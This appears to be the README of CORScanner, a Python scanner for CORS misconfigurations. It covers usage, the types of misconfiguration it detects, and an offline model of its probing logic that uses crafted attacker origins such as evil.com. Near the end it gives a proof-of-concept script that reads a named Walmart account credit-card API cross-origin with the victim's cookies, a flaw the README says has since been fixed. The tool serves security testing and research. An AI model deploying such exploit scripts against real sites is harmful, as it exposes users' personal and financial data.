cors
Fast CORS misconfiguration vulnerabilities scanner
Readme

About CORScanner

CORScanner is a Python tool designed to discover CORS misconfiguration vulnerabilities in websites. It helps website administrators and penetration testers check whether the domains/URLs they are targeting have insecure CORS policies.

Features

  • Fast. It uses gevent instead of Python threads for concurrency; gevent's lightweight greenlets are much cheaper than OS threads for I/O-bound network scanning.
  • Comprehensive. It covers all the common types of CORS misconfigurations we know of (see the "Misconfiguration types" table below).
  • Flexible. It supports user-defined options (e.g. file output, proxies, custom headers), which is helpful for large-scale scanning.
  • 🆕 CORScanner supports installation via pip (pip install corscanner or pip install cors)
  • 🆕 CORScanner can be used as a library in your project.

Two useful references for understanding CORS systematically:

Please consider citing our paper if you use CORScanner in scientific research.

LaTeX version:

@inproceedings{chen-cors,
author = {Jianjun Chen and Jian Jiang and Haixin Duan and Tao Wan and Shuo Chen and Vern Paxson and Min Yang},
title = {We Still Don{\textquoteright}t Have Secure Cross-Domain Requests: an Empirical Study of {CORS}},
booktitle = {27th {USENIX} Security Symposium ({USENIX} Security 18)},
year = {2018},
isbn = {978-1-939133-04-5},
address = {Baltimore, MD},
pages = {1079--1093},
url = {https://www.usenix.org/conference/usenixsecurity18/presentation/chen-jianjun},
publisher = {{USENIX} Association},
month = aug,
}

Word version:

Jianjun Chen, Jian Jiang, Haixin Duan, Tao Wan, Shuo Chen, Vern Paxson, and Min Yang. "We Still Don’t Have Secure Cross-Domain Requests: an Empirical Study of CORS." In 27th USENIX Security Symposium (USENIX Security 18), pp. 1079-1093. 2018.


Installation

  • Download this tool
git clone https://github.com/chenjj/CORScanner.git
  • Install dependencies
sudo pip install -r requirements.txt

CORScanner depends on the requests, gevent, tldextract, colorama and argparse python modules.

Python Version:

  • Both Python 2 (2.7.x) and Python 3 (3.7.x) are supported.

CORScanner as a library

  • Install CORScanner via pip
sudo pip install corscanner

or use the short name:

sudo pip install cors
  • Example code:
>>> from CORScanner.cors_scan import cors_check
>>> ret = cors_check("https://www.instagram.com", None)
>>> ret
{'url': 'https://www.instagram.com', 'type': 'reflect_origin', 'credentials': 'false', 'origin': 'https://evil.com', 'status_code': 200}

The second argument is an optional dict of extra request headers (the equivalent of -d on the command line); pass None to send none. In the result, type names the misconfiguration detected (see the "Misconfiguration types" table below), origin is the crafted Origin value the server accepted, and credentials records whether the response also carried Access-Control-Allow-Credentials: true. Only in that case does the browser attach the victim's cookies to the cross-origin request, so a finding with credentials 'false' exposes only data the endpoint already serves to unauthenticated clients.

You can also use CORScanner via the corscanner or cors command: corscanner -vu https://www.instagram.com

Usage

Short form   Long form    Description
-u           --url        URL/domain whose CORS policy to check
-d           --headers    Add headers to the request
-i           --input      File containing a list of URLs/domains to check
-t           --threads    Number of threads to use for the CORS scan
-o           --output     Save the results to a JSON file
-v           --verbose    Enable verbose mode and display results in real time
-T           --timeout    Set the request timeout (default 10 sec)
-p           --proxy      Enable proxy (http or socks5)
-h           --help       Show the help message and exit

Examples

  • To check CORS misconfigurations of specific domain:

python cors_scan.py -u example.com

  • To enable more debug info, use -v:

python cors_scan.py -u example.com -v

  • To save scan results to a JSON file, use -o:

python cors_scan.py -u example.com -o output_filename

  • To check CORS misconfigurations of specific URL:

python cors_scan.py -u http://example.com/restapi

  • To check CORS misconfiguration with specific headers:

python cors_scan.py -u example.com -d "Cookie: test"

  • To check CORS misconfigurations of multiple domains/URLs:

python cors_scan.py -i top_100_domains.txt -t 100

  • To enable proxy for CORScanner, use -p

python cors_scan.py -u example.com -p http://127.0.0.1:8080

To use socks5 proxy, install PySocks with pip install PySocks

python cors_scan.py -u example.com -p socks5://127.0.0.1:8080

  • To list all the basic options and switches, use the -h switch:

python cors_scan.py -h

Misconfiguration types

This tool covers the following misconfiguration types:

Misconfiguration type       Description
Reflect_any_origin          Blindly reflects the Origin request header in the Access-Control-Allow-Origin response header, so any website can read the response (and, with Access-Control-Allow-Credentials: true, the victim's authenticated data) by sending a cross-origin request.
Prefix_match                www.example.com trusts example.com.evil.com, which is an attacker's domain.
Suffix_match                www.example.com trusts evilexample.com, which could be registered by an attacker.
Not_escape_dot              www.example.com trusts wwwaexample.com (an unescaped "." in a regex matches any character), which could be registered by an attacker.
Substring_match             www.example.com trusts example.co, which could be registered by an attacker.
Trust_null                  www.example.com trusts the "null" origin, which an attacker can produce with a sandboxed iframe, a data: URL or a local file.
HTTPS_trust_HTTP            Risky trust dependency: an HTTPS site trusts its own plaintext http:// origin, so a MITM attacker may steal the HTTPS site's secrets.
Trust_any_subdomain         Risky trust dependency: an XSS in any subdomain may steal the site's secrets.
Custom_third_parties        Custom unsafe third-party origins such as github.io (shared hosting where anyone can obtain a page on the trusted origin); see the origins.json file for the list. Thanks @phackt!
Special_characters_bypass   Exploits browsers' handling of special characters in the Origin header. Most variants only work in Safari, except _, which also works in Chrome and Firefox. See "Advanced CORS Exploitation Techniques" for details. Thanks @Malayke.

Contributions of further misconfiguration types are welcome.
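The following is an added illustration (not CORScanner's own code) of what the cors_check library call above and the table of misconfiguration types amount to: for one target, craft one Origin header per type, send it, and flag the server whenever Access-Control-Allow-Origin comes back equal to the crafted value. The two "servers" are constructed policies so the example runs with no network access; registrable-domain extraction is simplified to the last two host labels (the real tool uses tldextract), and the finding dict mirrors the shape cors_check returns minus status_code.

```python
"""Offline model of a CORScanner-style probe set and classifier (added example)."""
from urllib.parse import urlsplit


def candidate_origins(url):
    """Build one probe Origin per misconfiguration type for the target URL.

    Assumption: the registrable domain is the last two labels of the host
    (CORScanner itself uses tldextract, which also handles suffixes like co.uk).
    """
    if "://" not in url:
        url = "https://" + url
    host = urlsplit(url).hostname
    root = ".".join(host.split(".")[-2:])  # www.example.com -> example.com
    return {
        "reflect_origin":      "https://evil.com",                     # unrelated attacker site
        "prefix_match":        f"https://{host}.evil.com",              # target is a prefix of attacker host
        "suffix_match":        f"https://evil{root}",                   # evilexample.com
        "not_escape_dot":      f"https://{host.replace('.', 'a', 1)}", # wwwaexample.com
        "substring_match":     f"https://{root[:-1]}",                  # example.co
        "trust_null":          "null",                                  # sandboxed iframe / data: URL
        "https_trust_http":    f"http://{host}",                        # plaintext origin of the same host
        "trust_any_subdomain": f"https://evil.{root}",                  # any subdomain, e.g. one with an XSS
    }


def classify_response(kind, origin, headers):
    """Return a finding (same fields as cors_check) or None.

    Only an exact echo of the crafted Origin counts. A wildcard "*" is not a
    finding here: browsers refuse to pair "*" with credentials, so it cannot
    expose authenticated data.
    """
    if headers.get("Access-Control-Allow-Origin") != origin:
        return None
    acac = headers.get("Access-Control-Allow-Credentials", "false").lower()
    return {"type": kind, "origin": origin, "credentials": acac}


def scan(url, server):
    """Probe `server` (a callable: Origin value -> response headers) with every crafted Origin."""
    findings = []
    for kind, origin in candidate_origins(url).items():
        finding = classify_response(kind, origin, server(origin))
        if finding:
            finding["url"] = url
            findings.append(finding)
    return findings


# --- constructed server policies for the demo; not real hosts ---------------

def sloppy_server(origin):
    """Trusts any Origin that ends with the company name: a common real-world bug."""
    if origin and origin.endswith("example.com"):
        return {"Access-Control-Allow-Origin": origin,
                "Access-Control-Allow-Credentials": "true"}
    return {}


def reflecting_server(origin):
    """Echoes whatever Origin it receives: the Reflect_any_origin case."""
    if not origin:
        return {}
    return {"Access-Control-Allow-Origin": origin,
            "Access-Control-Allow-Credentials": "true"}


def strict_server(origin):
    """Exact-match allowlist including the scheme, plus Vary: Origin so a
    shared cache never serves one origin's ACAO header to another."""
    allowed = {"https://www.example.com", "https://app.example.com"}
    if origin in allowed:
        return {"Access-Control-Allow-Origin": origin,
                "Access-Control-Allow-Credentials": "true",
                "Vary": "Origin"}
    return {}


if __name__ == "__main__":
    for name, server in (("sloppy", sloppy_server),
                         ("reflecting", reflecting_server),
                         ("strict", strict_server)):
        hits = scan("https://www.example.com", server)
        print(f"{name:10s} -> {[h['type'] for h in hits]}")
```

Note that a single careless check such as endswith("example.com") is hit by several probes at once (suffix, unescaped dot, plaintext scheme and any-subdomain), which is why the scanner sends the whole set rather than stopping at the first match; the strict policy, which compares the full origin string including its scheme, yields no findings.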

Exploitation examples

Here is an example of how to exploit the "Reflect_any_origin" misconfiguration on Walmart.com (since fixed). Localhost is the malicious website in the video.

Walmart.com video on YouTube: Walmart_CORS_misconfiguration_exploitation

Here is the exploitation code:

<script>
    // Send a cross origin request to the walmart.com server, when a victim visits the page.
    var req = new XMLHttpRequest();
    req.open('GET',"https://www.walmart.com/account/electrode/account/api/customer/:CID/credit-card",true);
    req.onload = stealData;
    req.withCredentials = true;
    req.send();

    function stealData(){
        //reading response is allowed because of the CORS misconfiguration.
        var data= JSON.stringify(JSON.parse(this.responseText),null,2);

        //display the data on the page. A real attacker can send the data to his server.
        output(data);
    }

    function output(inp) {
        document.body.appendChild(document.createElement('pre')).innerHTML = inp;
    }
</script>

If you have understood how the demo works, read Sections 5 and 6 of the CORS paper to learn how to exploit the other misconfigurations.

License

CORScanner is licensed under the MIT license. Take a look at the LICENSE file for more information.

Credits

This work is inspired by the following excellent research:

  • James Kettle, "Exploiting CORS misconfigurations for Bitcoins and bounties", AppSecUSA 2016
  • Evan Johnson, "Misconfigured CORS and why web appsec is not getting easier", AppSecUSA 2016
  • Jens Müller, "CORS misconfigurations on a large scale", CORStest
